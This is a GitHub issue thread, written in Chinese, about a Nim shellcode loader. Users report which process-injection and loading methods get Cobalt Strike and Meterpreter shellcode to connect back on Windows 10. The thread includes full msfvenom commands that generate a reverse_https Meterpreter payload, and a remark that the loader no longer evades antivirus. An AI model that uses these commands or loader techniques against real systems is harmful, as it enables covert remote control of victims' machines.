NimShellCodeLoader icon indicating copy to clipboard operation
NimShellCodeLoader copied to clipboard

程序加载方法兼容性综合测试

Open spooky18 opened this issue 3 years ago • 2 comments

测试环境在win 10 64位,Nim、MingW编译环境均为64位。其中很多方法不上线,不知道是我的测试方法不对还是?

Cobalt Strike 生成的64位 shellcode , 格式raw的bin文件

Thread_Pool_Wait 报错

image

Thread_Hiijack_Inject_Load 不上线

OEP_Hiijack_Inject_Load 不上线

APC_Ijnect_Load 不上线

Direct_Load 上线

Early_Bird_APC_Injetc_Load 上线

Fiber_Load 报错

image

msfvenom生成的64位 Shellcode、命令“ msfvenom -p windows/x64/meterpreter/reverse_https -f raw LPORT=443 -o test_x64.bin LHOST=xx.xx.xx.xx

APC_Ijnect_Load 不上线

Early_Bird_APC_Injetc_Load 不上线

Fiber_Load 不上线

Direct_Load 不上线

OEP_Hiijack_Inject_Load 不上线

Thread_Hiijack_Inject_Load 不上线

Thread_Pool_Wait 不上线

spooky18 avatar Oct 19 '21 12:10 spooky18

测试环境在win 10 64位,Nim、MingW编译环境均为64位。其中很多方法不上线,不知道是我的测试方法不对还是?

Cobalt Strike 生成的64位 shellcode , 格式raw的bin文件

Thread_Pool_Wait 报错

image

Thread_Hiijack_Inject_Load 不上线

OEP_Hiijack_Inject_Load 不上线

APC_Ijnect_Load 不上线

Direct_Load 上线

Early_Bird_APC_Injetc_Load 上线

Fiber_Load 报错

image

msfvenom生成的64位 Shellcode、命令“ msfvenom -p windows/x64/meterpreter/reverse_https -f raw LPORT=443 -o test_x64.bin LHOST=xx.xx.xx.xx

APC_Ijnect_Load 不上线

Early_Bird_APC_Injetc_Load 不上线

Fiber_Load 不上线

Direct_Load 不上线

OEP_Hiijack_Inject_Load 不上线

Thread_Hiijack_Inject_Load 不上线

Thread_Pool_Wait 不上线

我使用的命令msfvenom -p windows/x64/meterpreter/reverse_https -f raw LPORT=4433 -o test_x64.bin LHOST=192.168.1.11 图片 win10可以正常上线,这个现在已经不免杀了,需要关闭杀软。

aeverj avatar Oct 20 '21 13:10 aeverj

win10可以正常上线,这个现在已经不免杀了,需要关闭杀软。

我确定了是关闭了杀毒软件后,只有Direct和Early_Bird_APC_Injetc_Load可以上线,其它的5种方法有2个直接报错,其余的不报错但是不上线,您方便的话可以按我测试不成功加载方法试一下。 Thread_Pool_Wait 报错,不上线

Thread_Hiijack_Inject_Load 不上线

OEP_Hiijack_Inject_Load 不上线

APC_Ijnect_Load 不上线

Fiber_Load 报错,不上线

spooky18 avatar Oct 25 '21 02:10 spooky18